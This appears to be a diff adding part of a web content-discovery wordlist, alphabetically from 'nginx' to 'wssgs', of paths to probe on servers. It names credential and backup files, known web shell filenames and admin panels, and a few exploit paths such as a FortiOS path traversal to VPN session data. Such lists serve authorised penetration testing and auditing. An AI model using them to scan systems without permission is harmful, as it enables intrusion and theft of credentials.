+nginx-access.log
+nginx-error.log
+nginx-ssl.access.log
+nginx-ssl.error.log
+nginx-status/
+nginx.conf
+nginx_status
+nginx_template.conf
+ngx_pagespeed_beacon/
+nia.cache
+nimcache/
+nlia.cache
+node-role.kubernetes.io
+node_modules
+node_modules/
+nohup.out
+nosetests.xml
+npm-debug.log
+npm-shrinkwrap.json
+nra.cache
+nst.php
+nstview.php
+nsw/
+nsw/admin/login.php
+nwp-content/
+nwp-content/plugins/disqus-comment-system/disqus.php
+nytprof.out
+oab/
+obj/
+ocp.php
+ocsp/
+odbc
+Office/
+Office/graph.php
+olap/
+old
+old.7z
+old.htaccess
+old.htpasswd
+old.rar
+old.tar
+old.tar.bz2
+old.tar.gz
+old.zip
+old/
+old_files
+old_site/
+oldfiles
+ona
+opa-debug-js
+open-flash-chart.swf?get-data=xss
+OpenCover/
+openshift/
+openstack/
+opentsdb/
+openvpn.ovpn
+openvpnadmin/
+operador/
+operator/
+oprocmgr-service
+oprocmgr-status
+ops/
+oracle
+order.log
+order.txt
+order_add_log.txt
+order_log
+orders
+orders.csv
+orders.log
+orders.sql
+orders.sql.gz
+orders.txt
+orders.xls
+orders_log
+orleans.codegen.cs
+ospfd.conf
+osticket/
+otrs/
+out.txt
+out/
+output
+output-build.txt
+output/
+owa/
+OWA/
+owncloud/
+p.php
+p/
+p/m/a/
+package-cache
+package-lock.json
+package.json
+Package.StoreAssociation.xml
+package/
+packer_cache/
+pagerduty/
+pages/
+pages/admin/
+pages/admin/admin-login
+pages/admin/admin-login.html
+pages/admin/admin-login.php
+painel/
+painel/config/config.php.example
+paket-files/
+panel
+panel-administracion/
+panel-administracion/admin.html
+panel-administracion/admin.php
+panel-administracion/index.html
+panel-administracion/index.php
+panel-administracion/login
+panel-administracion/login.html
+panel-administracion/login.php
+panel.php
+panel/
+params.txt
+parts/
+pass
+pass.dat
+pass.txt
+passes.txt
+passlist
+passlist.txt
+passwd
+passwd.adjunct
+passwd.bak
+passwd.txt
+Password
+password
+password.html
+password.log
+password.mdb
+password.sqlite
+password.txt
+passwords
+passwords.html
+passwords.mdb
+passwords.sqlite
+passwords.txt
+path/
+path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+pause
+pause.json
+payment.log
+payment_authorizenet.log
+payment_paypal_express.log
+pbmadmin/
+pbx/
+pentaho/
+perl-reverse-shell.pl
+perlcmd.cgi
+persistentchat/
+personal
+personal.mdb
+personal.sqlite
+pg_hba.conf
+pgadmin
+pgadmin.log
+pgadmin/
+PharoDebug.log
+phinx.yml
+phoenix
+phoneconferencing/
+php
+php-backdoor.php
+php-cgi.core
+php-cli.ini
+php-cs-fixer.phar
+php-error.log
+php-error.txt
+php-errors.log
+php-errors.txt
+php-findsock-shell.php
+php-fpm/
+php-fpm/error.log
+php-fpm/www-error.log
+php-info.php
+php-my-admin/
+php-myadmin/
+php-reverse-shell.php
+php-tiny-shell.php
+php.core
+php.error.log
+php.ini
+php.ini-orig.txt
+php.ini.sample
+php.ini_
+php.ini~
+php.lnk
+php.log
+php.php
+php/
+php/dev/
+php/php.cgi
+php4.ini
+php5.fcgi
+php5.ini
+php_cli_errors.log
+php_error.log
+php_error_log
+php_errorlog
+php_errors.log
+phpadmin/
+phpadmin/index.php
+phpadminmy/
+phperrors.log
+phpFileManager.php
+phpFileManager/
+phpfm-1.6.1/
+phpfm-1.7.1/
+phpfm-1.7.2/
+phpfm-1.7.3/
+phpfm-1.7.4/
+phpfm-1.7.5/
+phpfm-1.7.6/
+phpfm-1.7.7/
+phpfm-1.7.8/
+phpfm-1.7/
+phpfm.php
+phpfm/
+phpinfo
+phpinfo.php
+phpinfo.php3
+phpinfo.php4
+phpinfo.php5
+phpinfos.php
+phpini.bak
+phpldapadmin
+phpldapadmin/
+phpliteadmin%202.php
+phpliteadmin.php
+phpLiteAdmin/
+phpLiteAdmin_/
+phpm/
+phpma/
+phpma/index.php
+phpmailer
+phpmanager/
+phpmem/
+phpmemcachedadmin/
+phpminiadmin.php
+phpminiadmin/
+phpmoadmin/
+phpMoAdmin/
+phpmy-admin/
+phpmy/
+phpMy/
+phpMyA/
+phpmyad-sys/
+phpmyad/
+phpMyAdmi/
+phpMyAdmin-2.10.0/
+phpMyAdmin-2.10.1/
+phpMyAdmin-2.10.2/
+phpMyAdmin-2.10.3/
+phpMyAdmin-2.11.0/
+phpMyAdmin-2.11.1/
+phpMyAdmin-2.11.10/
+phpMyAdmin-2.11.2/
+phpMyAdmin-2.11.3/
+phpMyAdmin-2.11.4/
+phpMyAdmin-2.11.5.1-all-languages/
+phpMyAdmin-2.11.5/
+phpMyAdmin-2.11.6-all-languages/
+phpMyAdmin-2.11.6/
+phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.7.1-all-languages/
+phpMyAdmin-2.11.7/
+phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.8.1-all-languages/
+phpMyAdmin-2.11.8.1/
+phpMyAdmin-2.11.9/
+phpMyAdmin-2.2.3/
+phpMyAdmin-2.2.6/
+phpMyAdmin-2.5.1/
+phpMyAdmin-2.5.4/
+phpMyAdmin-2.5.5-pl1/
+phpMyAdmin-2.5.5-rc1/
+phpMyAdmin-2.5.5-rc2/
+phpMyAdmin-2.5.5/
+phpMyAdmin-2.5.6-rc1/
+phpMyAdmin-2.5.6-rc2/
+phpMyAdmin-2.5.6/
+phpMyAdmin-2.5.7-pl1/
+phpMyAdmin-2.5.7/
+phpMyAdmin-2.6.0-alpha/
+phpMyAdmin-2.6.0-alpha2/
+phpMyAdmin-2.6.0-beta1/
+phpMyAdmin-2.6.0-beta2/
+phpMyAdmin-2.6.0-pl1/
+phpMyAdmin-2.6.0-pl2/
+phpMyAdmin-2.6.0-pl3/
+phpMyAdmin-2.6.0-rc1/
+phpMyAdmin-2.6.0-rc2/
+phpMyAdmin-2.6.0-rc3/
+phpMyAdmin-2.6.0/
+phpMyAdmin-2.6.1-pl1/
+phpMyAdmin-2.6.1-pl2/
+phpMyAdmin-2.6.1-pl3/
+phpMyAdmin-2.6.1-rc1/
+phpMyAdmin-2.6.1-rc2/
+phpMyAdmin-2.6.1/
+phpMyAdmin-2.6.2-beta1/
+phpMyAdmin-2.6.2-pl1/
+phpMyAdmin-2.6.2-rc1/
+phpMyAdmin-2.6.2/
+phpMyAdmin-2.6.3-pl1/
+phpMyAdmin-2.6.3-rc1/
+phpMyAdmin-2.6.3/
+phpMyAdmin-2.6.4-pl1/
+phpMyAdmin-2.6.4-pl2/
+phpMyAdmin-2.6.4-pl3/
+phpMyAdmin-2.6.4-pl4/
+phpMyAdmin-2.6.4-rc1/
+phpMyAdmin-2.6.4/
+phpMyAdmin-2.7.0-beta1/
+phpMyAdmin-2.7.0-pl1/
+phpMyAdmin-2.7.0-pl2/
+phpMyAdmin-2.7.0-rc1/
+phpMyAdmin-2.7.0/
+phpMyAdmin-2.8.0-beta1/
+phpMyAdmin-2.8.0-rc1/
+phpMyAdmin-2.8.0-rc2/
+phpMyAdmin-2.8.0.1/
+phpMyAdmin-2.8.0.2/
+phpMyAdmin-2.8.0.3/
+phpMyAdmin-2.8.0.4/
+phpMyAdmin-2.8.0/
+phpMyAdmin-2.8.1-rc1/
+phpMyAdmin-2.8.1/
+phpMyAdmin-2.8.2/
+phpMyAdmin-2/
+phpMyAdmin-3.0.0/
+phpMyAdmin-3.0.1/
+phpMyAdmin-3.1.0/
+phpMyAdmin-3.1.1/
+phpMyAdmin-3.1.2/
+phpMyAdmin-3.1.3/
+phpMyAdmin-3.1.4/
+phpMyAdmin-3.1.5/
+phpMyAdmin-3.2.0/
+phpMyAdmin-3.2.1/
+phpMyAdmin-3.2.2/
+phpMyAdmin-3.2.3/
+phpMyAdmin-3.2.4/
+phpMyAdmin-3.2.5/
+phpMyAdmin-3.3.0/
+phpMyAdmin-3.3.1/
+phpMyAdmin-3.3.2-rc1/
+phpMyAdmin-3.3.2/
+phpMyAdmin-3.3.3-rc1/
+phpMyAdmin-3.3.3/
+phpMyAdmin-3.3.4-rc1/
+phpMyAdmin-3.3.4/
+phpMyAdmin-3/
+phpMyAdmin-4/
+phpmyadmin-old/index.php
+phpMyAdmin.old/index.php
+phpmyadmin/
+phpMyAdmin/
+phpMyadmin/
+phpmyAdmin/
+phpMyAdmin/index.php
+phpmyadmin/index.php
+phpmyadmin/phpmyadmin/index.php
+phpMyAdmin/phpMyAdmin/index.php
+phpMyAdmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+phpmyadmin0/
+phpMyAdmin0/
+phpmyadmin0/index.php
+phpMyAdmin1/
+phpmyadmin1/
+phpmyadmin1/index.php
+phpmyadmin2/
+phpMyAdmin2/
+phpmyadmin2/index.php
+phpmyadmin2011/
+phpmyadmin2012/
+phpmyadmin2013/
+phpmyadmin2014/
+phpmyadmin2015/
+phpmyadmin2016/
+phpmyadmin2017/
+phpmyadmin2018/
+phpmyadmin3/
+phpMyAdmin3/
+phpmyadmin4/
+phpMyAdmin4/
+phpMyadmin_bak/index.php
+phpMyAdminBackup/
+phpMyAdminold/index.php
+phpMyAds/
+phppgadmin
+phpPgAdmin/
+phppgadmin/
+phppma/
+phpRedisAdmin/
+phpredmin/
+phproad/
+phpsecinfo/
+phpspec.yml
+phpSQLiteAdmin/
+phpstudy.php
+phpsysinfo/
+phptest.php
+phpThumb.php
+phpThumb/
+phpunit.phar
+phpunit.xml
+phpunit.xml.dist
+phymyadmin/
+pi.php
+pi.php5
+pids
+pinfo.php
+pip-delete-this-directory.txt
+pip-log.txt
+piwigo/
+piwigo/extensions/UserCollections/template/ZeroClipboard.swf
+pkg/
+placeholder_one
+placeholder_two
+planning/cfg
+planning/docs
+planning/src
+platz_login/
+play-cache
+play-stash
+player.swf
+playground
+playground.xcworkspace
+plugin.xml
+plugins
+plugins.log
+plugins/
+plugins/editors/fckeditor
+plugins/fckeditor
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
+plugins/tiny_mce/
+plugins/tinymce/
+plugins/upload.php
+plugins/web.config
+plupload
+pm_to_blib
+pma-old/index.php
+PMA/
+pma/
+pma/index.php
+PMA/index.php
+pma/scripts/setup.php
+PMA2/index.php
+pma2005/
+PMA2005/
+pma2009/
+PMA2009/
+PMA2011/
+pma2011/
+pma2012/
+PMA2012/
+pma2013/
+PMA2013/
+pma2014/
+PMA2014/
+PMA2015/
+pma2015/
+pma2016/
+PMA2016/
+pma2017/
+PMA2017/
+pma2018/
+PMA2018/
+pma4/
+pmadmin/
+pmamy/index.php
+pmamy2/index.php
+pmd/index.php
+pmyadmin/
+pods/
+pom.xml
+pom.xml.asc
+pom.xml.next
+pom.xml.releaseBackup
+pom.xml.tag
+pom.xml.versionsBackup
+portal/
+postgresql.conf
+power_user/
+powershell/
+pprof/
+printenv
+printenv.tmp
+priv8.php
+private.key
+private.mdb
+private.sqlite
+privatekey.key
+processlogin
+processlogin.php
+Procfile
+Procfile.dev
+Procfile.offline
+product.json
+productcockpit/
+production.log
+profiles
+profiles.xml
+program/
+proguard/
+project-admins/
+project.fragment.lock.json
+project.lock.json
+project.xml
+project/project
+project/target
+prometheus
+prometheus/
+prometheus/targets
+propel.ini
+propel.json
+protected/data/
+protected/runtime/
+providers.json
+proxy.pac
+proxy.stream?origin=https://google.com
+proxy/
+proxy_config.json
+prv/
+PSUser/
+public
+public..
+public/
+public/hot
+public/storage
+public/system
+public_html.zip
+public_html/
+publication_list.xml
+publish/
+PublishScripts/
+pubspec.lock
+puppet/
+pureadmin/
+putty.reg
+pw.txt
+pwd.db
+pws.txt
+py-compile
+qa/
+qq.php
+qql/
+qsd-php-backdoor.php
+query.log
+QuickLook/
+quikstore.cfg
+r.php
+r00t.php
+r57.php
+r57eng.php
+r57shell.php
+r58.php
+r99.php
+rabbitmq/
+radius/
+radmind-1/
+radmind/
+rails/info/properties
+Rakefile
+raygun/
+rcf/
+rcjakar/
+rcjakar/admin/login.php
+rcLogin/
+rdoc/
+reach/sip.svc
+Read
+Read%20Me.txt
+read.me
+Read_Me.txt
+readme
+ReadMe
+README
+Readme
+README.htm
+ReadMe.html
+Readme.html
+readme.html
+README.HTML
+README.html
+ReadMe.md
+readme.md
+Readme.md
+README.MD
+README.md
+README.mkd
+readme.mkd
+readme.php
+Readme.txt
+README.txt
+README.TXT
+readme.txt
+ReadMe.txt
+recentservers.xml
+redis/
+redmine/
+refresh
+refresh.json
+register.php
+registration/
+registry/
+rel/example_project
+release.properties
+RELEASE_NOTES.txt
+relogin
+relogin.htm
+relogin.html
+relogin.php
+remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
+remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+repo/
+request.log
+requesthandler/
+requesthandlerext/
+requirements.txt
+rerun.txt
+reseller
+resources.xml
+resources/
+resources/.arch-internal-preview.css
+resources/fckeditor
+resources/sass/.sass-cache/
+resources/tmp/
+rest-api/
+rest-auth/
+rest/
+rest/v1
+rest/v3/doc
+restart
+restart.json
+restore.php
+restricted
+resume
+resume.json
+revision.inc
+revision.txt
+rgs/
+rgsclients/
+robot.txt
+robots.txt
+robots.txt.dist
+root
+root/
+RootCA.crt
+roundcube/index.php
+routes
+rpc/
+rpcwithcert/
+rsconnect/
+rst.php
+rudder/
+run.sh
+run.zip
+runningpods/
+RushSite.xml
+s.php
+sa.php
+sa2.php
+sales.csv
+sales.log
+sales.sql
+sales.sql.gz
+sales.txt
+sales.xls
+salesforce.schema
+saltstack/
+sample.txt
+sample.txt~
+Saved/
+sbt/
+scalyr/
+scheduledtasks
+scheduler/
+schema.sql
+schema.yml
+script.zip
+script/
+script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+scripts
+scripts.zip
+scripts/
+scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
+scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
+scripts/ckeditor/ckfinder/core/connector/php/connector.php
+scripts/setup.php
+sdb.php
+sdist/
+searchreplacedb2.php
+searchreplacedb2cli.php
+secret
+Secret/
+secret/
+secrets.env
+secrets/
+secring.bak
+secring.pgp
+secring.skr
+secure/
+security/
+selenium/
+sendgrid.env
+sensu/
+sentemails.log
+sentry/
+serv-u.ini
+Server
+server-info
+server-status
+server-status/
+server.cert
+server.cfg
+server.config.yaml
+server.js
+server.key
+server.log
+server.ovpn
+Server.php
+server.pid
+server.xml
+Server/
+server/config.json
+server/server.js
+server_admin_small/
+server_stats
+ServerAdministrator/
+ServerList.cfg
+ServerList.xml
+servers.xml
+serverStatus.log
+service-registry/instance-status
+service-registry/instance-status.json
+service.asmx
+service.yaml
+serviceaccount.crt
+ServiceFabricBackup/
+services
+services/
+services/config/databases.yml
+servlet/
+servlet/%C0%AE%C0%AE%C0%AF
+servlet/DMSDump
+servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/SnoopServlet
+servlet/Spy
+session/
+sessions
+sessions/
+settings.php
+settings.php.bak
+settings.php.dist
+settings.php.old
+settings.php.save
+settings.php.swp
+settings.php.txt
+settings.php~
+settings.py
+settings.xml
+settings/
+Settings/ui.plist
+setup
+setup.data
+setup.log
+setup.php
+setup.sql
+setup/
+sftp-config.json
+Sh3ll.php
+sheep.php
+shell.php
+shell.sh
+shell/
+shellz.php
+shopdb/
+show
+showcode.asp
+showlogin/
+shutdown
+sidekiq
+sidekiq_monitor
+sign-in
+sign-in/
+sign_in
+sign_in/
+signin
+signin.php
+signin/
+signup.action
+simple-backdoor.php
+simpleLogin/
+sip/
+site
+site.rar
+site.sql
+site.tar
+site.tar.bz2
+site.tar.gz
+site.txt
+site.zip
+site/
+site/common.xml
+site_admin
+siteadmin
+siteadmin.php
+siteadmin/
+siteadmin/index.php
+siteadmin/login.html
+siteadmin/login.php
+sitemanager.xml
+sites.ini
+sites.xml
+sites/all/libraries/README.txt
+sites/all/modules/README.txt
+sites/all/themes/README.txt
+sites/default/private/files/backup_migrate/scheduled/test.txt
+sites/example.sites.php
+sites/README.txt
+sized/
+slapd.conf
+smblogin/
+snoop.jsp
+snort/
+soap/
+soap/servlet/soaprouter
+soap/servlet/Spy
+soapdocs/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+soapserver/
+sonar/
+sonarcube/
+sonarqube/
+source
+source.php
+source.zip
+source/
+source/inspector.html
+source_gen
+source_gen.caches
+SourceArt/
+spamlog.log
+spec/
+spec/examples.txt
+spec/lib/database.yml
+spec/lib/settings.local.yml
+spec/reports/
+spec/tmp
+splunk/
+spwd.db
+spy.aspx
+sql-admin/
+sql.inc
+sql.php
+sql.sql
+sql.tar
+sql.tar.bz2
+sql.tar.gz
+sql.tgz
+sql.txt
+sql.zip
+sql/
+sql/index.php
+sql/myadmin/
+sql/php-myadmin/
+sql/phpmanager/
+sql/phpmy-admin/
+sql/phpMyAdmin/
+sql/phpmyadmin2/
+sql/phpMyAdmin2/
+sql/sql-admin/
+sql/sql/
+sql/sqladmin/
+sql/sqlweb/
+sql/webadmin/
+sql/webdb/
+sql/websql/
+sql_dumps
+sql_error.log
+sqladm
+sqladmin
+sqladmin/
+sqlbuddy
+sqlbuddy/
+sqlbuddy/login.php
+sqldump.sql
+sqlmanager/
+sqlmigrate.php
+sqlnet.log
+sqlweb/
+SQLyogTunnel.php
+SqueakDebug.log
+squid-reports/
+squid/
+squid3_log/
+src/
+src/app.js
+src/index.js
+src/server.js
+srv/
+srv_gen/
+ss_vms_admin_sm/
+ssh/
+sshadmin/
+ssl/
+st.php
+stackstorm/
+stacktrace.log
+staff/
+stage_create_service.sh
+stage_create_service_dev.sh
+stage_create_service_prod.sh
+stage_deploy.sh
+stage_deploy_dev.sh
+stage_deploy_prod.sh
+stamp-h1
+staradmin/
+start.html
+start.sh
+startServer.log
+startup.cfg
+startup.sh
+stas/
+stash/
+stat/
+static..
+static/dump.sql
+statistics
+statistics/
+stats
+stats/
+statsd/
+status.php
+status.xsl
+status/
+status?full=true
+statusicon/
+storage/
+storage/logs/laravel.log
+store.tgz
+StreamingStatistics
+stronghold-info
+stronghold-status
+stssys.htm
+StyleCopReport.xml
+stylesheets/bundles
+sub-login/
+subversion/
+sugarcrm.log
+supe.php
+super
+Super-Admin/
+super.php
+super1
+super1/
+super_inde.php
+super_index
+super_logi.php
+super_login
+superma.php
+superman
+superman/
+supermanage.php
+supermanager
+superuse.php
+superuser
+superuser.php
+superuser/
+supervise/
+supervise/Logi.php
+supervise/Login
+supervisor/
+supervisord/
+support/
+support_login/
+surgemail/
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
+suspended.page
+svn.revision
+SVN/
+svn/
+svn/wc.db
+swagger
+swagger-resources
+swagger-ui
+swagger-ui.html
+swagger.json
+swagger.yaml
+swagger/index.html
+swagger/swagger-ui.htm
+swagger/swagger-ui.html
+swagger/ui
+swagger/v1/swagger.json
+swaggerui
+swfobject.js
+swfupload
+swfupload.swf
+sxd/
+sxd/backup/
+sxdpro/
+sYm.php
+Sym.php
+sym/
+sym/root/home/
+symfony/
+symfony/apps/frontend/config/routing.yml
+symfony/apps/frontend/config/settings.yml
+symfony/config/databases.yml
+Symlink.php
+Symlink.pl
+symphony/
+symphony/apps/frontend/config/app.yml
+symphony/apps/frontend/config/databases.yml
+symphony/config/app.yml
+symphony/config/databases.yml
+syncNode.log
+sypex.php
+sypexdumper.php
+SypexDumper_2011/
+sys-admin/
+sys/pprof
+sysadm
+sysadm.php
+sysadm/
+sysadmin
+sysadmin.php
+sysadmin/
+SysAdmin/
+SysAdmin2/
+sysadmins
+sysadmins/
+sysbackup
+sysinfo.txt
+syslog/
+system-administration/
+system.log
+system.zip
+system/
+system/cache/
+system/cron/cron.txt
+system/error.txt
+system/expressionengine/config/config.php
+system/expressionengine/config/database.php
+system/log/
+system/logs/
+system/storage/
+system_administration/
+SystemErr.log
+SystemOut.log
+t00.php
+tags
+tar
+tar.bz2
+tar.gz
+tar.php
+target
+target/
+tasks/
+tconn.conf
+team/
+technico.txt
+telephone
+telphin.log
+temp-testng-customsuite.xml
+temp.php
+temp.sql
+temp/
+TEMP/
+template/
+templates/
+templates/beez/index.php
+templates/beez3/
+templates/index.html
+templates/ja-helio-farsi/index.php
+templates/protostar/
+templates/rhuk_milkyway/index.php
+templates/system/
+templates_c/
+teraform/
+test
+test-build/
+test-driver
+test-output/
+test-report/
+test-result
+test.asp
+test.aspx
+test.chm
+test.htm
+test.html
+test.jsp
+test.mdb
+test.php
+test.sqlite
+test.txt
+test/
+test/php/test.html
+test/reports
+test/ssi/test.shtml
+test/tmp/
+test/version_tmp/
+test0.php
+test1
+test1.php
+test123.php
+test2
+test2.php
+test3.php
+test4.php
+test5.php
+test6.php
+test7.php
+test8.php
+test9.php
+test_
+test_gen
+test_gen.caches
+test_ip.php
+testfile.php
+Testing
+testproxy.php
+TestResult.xml
+tests
+tests/
+tests/phpunit_report.xml
+texinfo.tex
+textpattern/
+themes
+themes/
+themes/default/htdocs/flash/ZeroClipboard.swf
+Thorfile
+threaddump
+Thumbs.db
+thumbs.db
+thumbs/
+tikiwiki
+timeline.xctimeline
+tiny_mce/
+tiny_mce/plugins/filemanager/examples.html
+tiny_mce/plugins/imagemanager/pages/im/index.html
+tinyfilemanager-2.0.1/
+tinyfilemanager-2.0.2/
+tinyfilemanager-2.2.0/
+tinyfilemanager-2.3/
+tinyfilemanager.php
+tinyfilemanager/
+tinymce
+tinymce/
+TMP
+tmp
+tmp.php
+tmp/
+tmp/2.php
+tmp/access.log
+tmp/access_log
+tmp/admin.php
+tmp/cache/models/
+tmp/cache/persistent/
+tmp/cache/views/
+tmp/cgi.pl
+tmp/Cgishell.pl
+tmp/changeall.php
+tmp/cpn.php
+tmp/d.php
+tmp/d0maine.php
+tmp/domaine.php
+tmp/domaine.pl
+tmp/dz.php
+tmp/dz1.php
+tmp/error.log
+tmp/error_log
+tmp/index.php
+tmp/killer.php
+tmp/L3b.php
+tmp/madspotshell.php
+tmp/nanoc/
+tmp/priv8.php
+tmp/root.php
+tmp/sessions/
+tmp/sql.php
+tmp/Sym.php
+tmp/tests/
+tmp/up.php
+tmp/upload.php
+tmp/uploads.php
+tmp/user.php
+tmp/vaga.php
+tmp/whmcs.php
+tmp/xd.php
+TODO
+token.json
+tokenlite.zip
+tomcat-docs/appdev/sample/web/hello.jsp
+tomcat/axis/
+tools
+tools.php
+tools/
+tools/_backups/
+tools/phpMyAdmin/index.php
+trace
+Trace.axd
+Trace.axd::$DATA
+trace.json
+translate.sql
+transmission/web/
+tresearch/
+tresearch/happyaxis.jsp
+tripwire/
+trivia/
+tsconfig.json
+tst
+twitter/.env
+txt/
+typings/
+typo3
+typo3/
+typo3/phpmyadmin/
+typo3/phpmyadmin/index.php
+typo3/phpmyadmin/scripts/setup.php
+typo3_src
+typo3conf/AdditionalConfiguration.php
+typo3conf/temp_fieldInfo.php
+typo3temp/
+uber/
+uber/phpMemcachedAdmin/
+uber/phpMyAdmin/
+uber/phpMyAdminBackup/
+ucwa/
+uddi
+uddiexplorer
+ui
+ui/
+unattend.txt
+unifiedmessaging/
+up.php
+update
+update.php
+UPDATE.txt
+updates
+upfile.php
+UPGRADE
+upgrade.php
+upgrade.readme
+UPGRADE.txt
+UpgradeLog.XML
+upguard/
+upl.php
+Upload
+upload
+upload.asp
+upload.aspx
+upload.cfm
+upload.htm
+upload.html
+upload.php
+upload.php3
+upload.shtm
+upload.zip
+upload/
+upload/1.php
+upload/2.php
+upload/b_user.csv
+upload/b_user.xls
+upload/loginIxje.php
+upload/test.php
+upload/test.txt
+upload/upload.php
+upload2.php
+upload_backup/
+upload_file.php
+uploaded/
+uploader.php
+uploader/
+uploadfile.asp
+uploadfile.php
+uploadfiles.php
+uploadify.php
+uploadify/
+uploads.php
+uploads.zip
+uploads/
+uploads/dump.sql
+upstream_conf
+ur-admin
+ur-admin.php
+ur-admin/
+usage/
+user
+user.asp
+user.html
+user.php
+user.txt
+user/
+user/admin
+user/admin.php
+user_guide
+user_guide_src/build/
+user_guide_src/cilexer/build/
+user_guide_src/cilexer/dist/
+user_guide_src/cilexer/pycilexer.egg-info/
+user_uploads
+useradmin
+useradmin/
+userdb
+UserFile
+UserFiles
+userfiles
+userlogin
+userlogin.php
+UserLogin/
+usernames.txt
+users
+users.csv
+users.db
+users.ini
+users.json
+users.log
+users.mdb
+users.php
+users.sql
+users.sql.gz
+users.sqlite
+users.txt
+users.xls
+users/
+users/admin
+users/admin.php
+usr/
+usuario/
+usuarios/
+usuarios/login.php
+utility_login/
+uvpanel/
+uwsgi.ini
+v1
+v1.0
+v1.1
+v1.zip
+v1/
+v1/graphiql
+v1/graphql
+v1/playground
+v1/public/yql
+v1/test/js/console.html
+v1/test/js/console_ajax.js
+v2
+v2.0
+v2.zip
+v2/
+v2/_catalog
+v2/graphiql
+v2/graphql
+v2/keys/?recursive=true
+v2/playground
+v3
+v3/graphiql
+v3/graphql
+v3/playground
+vadmind/
+vagrant-spec.config.rb
+vagrant/
+Vagrantfile
+Vagrantfile.backup
+validator.php
+var/
+var/backups/
+var/bootstrap.php.cache
+var/cache/
+var/log
+var/log/
+var/log/authorizenet.log
+var/log/exception.log
+var/log/librepag.log
+var/log/old
+var/log/payment.log
+var/log/payment_authorizenet.log
+var/log/payment_paypal_express.log
+var/logs/
+var/package/
+var/sessions/
+variant/
+vault/
+vb.rar
+vb.sql
+vb.zip
+vendor/
+vendor/assets/bower_components
+vendor/bundle
+vendor/composer/installed.json
+vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+vendors/
+venv.bak/
+venv/
+version
+version.txt
+VERSION.txt
+version/
+video-js.swf
+view-source
+view.php
+views
+vignettes/
+violations/
+vm
+vmailadmin/
+vorod
+vorod.php
+vorod/
+vorud
+vorud.php
+vorud/
+vpn/
+vqmod/checked.cache
+vqmod/logs/
+vqmod/mods.cache
+vqmod/vqcache/
+vtiger/
+vtigercrm/
+vtund.conf
+w.php
+wallet.dat
+wallet.json
+war/gwt_bree/
+war/WEB-INF/classes/
+war/WEB-INF/deploy/
+wc.php
+wcx_ftp.ini
+web-app/plugins
+web-app/WEB-INF/classes
+web-console/
+web-console/Invoker
+web-console/ServerInfo.jsp
+web-console/status?full=true
+WEB-INF./
+WEB-INF./web.xml
+WEB-INF/
+WEB-INF/config.xml
+WEB-INF/lib/_wl_cls_gen.jar
+WEB-INF/web.xml
+web-variables.env
+web.7z
+web.config
+web.config.bak
+web.config.bakup
+web.config.old
+web.config.temp
+web.config.tmp
+web.config.txt
+web.config::$DATA
+web.Debug.config
+web.rar
+web.Release.config
+web.sql
+web.tar
+web.tar.bz2
+web.tar.gz
+web.tgz
+web.xml
+web.zip
+web/
+web/bundles/
+web/phpMyAdmin/
+web/phpMyAdmin/index.php
+web/phpMyAdmin/scripts/setup.php
+web/scripts/setup.php
+web/uploads/
+webadmin
+webadmin.html
+webadmin.php
+webadmin/
+webadmin/admin.html
+webadmin/admin.php
+webadmin/index.html
+webadmin/index.php
+webadmin/login.html
+webadmin/login.php
+webalizer
+webapp/wm/runtime.jsp
+webdav.password
+webdav/
+webdav/index.html
+webdav/servlet/webdav/
+webdb/
+webgrind
+weblogs
+webmail/
+webmail/src/configtest.php
+webmaster
+webmaster.php
+webmaster/
+webmin/
+webpack.config.js
+webpack.mix.js
+website.git
+website.tar
+website.tar.bz2
+website.tar.gz
+website.zip
+websql/
+webstat
+webstat/
+webstats
+webstats.html
+webstats/
+webticket/
+webticket/webticketservice.svc
+weixiao.php
+well-known.zip
+wenzhang
+wget-log
+wheels/
+whmcs.php
+whmcs/
+whmcs/downloads/dz.php
+wiki/
+winscp.ini
+WinSCP.ini
+wizmysqladmin/
+wordpress.tar
+wordpress.tar.bz2
+wordpress.tar.gz
+wordpress.zip
+wordpress/
+wordpress/wp-login.php
+workspace.xml
+workspace/uploads/
+wp-admin/
+wp-admin/c99.php
+wp-admin/install.php
+wp-admin/setup-config.php
+wp-app.log
+wp-cli.yml
+wp-config-sample.php
+wp-config.inc
+wp-config.old
+wp-config.php
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php~
+wp-content/
+wp-content/backup-db/
+wp-content/backups/
+wp-content/blogs.dir/
+wp-content/cache/
+wp-content/debug.log
+wp-content/mu-plugins/
+wp-content/plugins/adminer/inc/editor/index.php
+wp-content/plugins/count-per-day/js/yc/d00.php
+wp-content/plugins/hello.php
+wp-content/upgrade/
+wp-content/uploads/
+wp-content/uploads/dump.sql
+wp-content/uploads/file-manager/log.txt
+wp-includes/
+wp-includes/rss-functions.php
+wp-json/
+wp-json/wp/v2/users/
+wp-login.php
+wp-login/
+wp-register.php
+wp.php
+wp.rar/
+wp.zip
+wp/
+wp/wp-login.php
+wpad.dat
+ws.php
+WS_FTP.INI
+ws_ftp.ini
+WS_FTP.ini
+WS_FTP.LOG
+WS_FTP/
+WS_FTP/Sites/ws_ftp.ini
+wsadmin.traceout
+wsadmin.valout
+wsadminListener.out
+wshell.php
+wsman
+WSO.php
+wso.php
+wso2.5.1.php
+wso2.php
+wssgs/
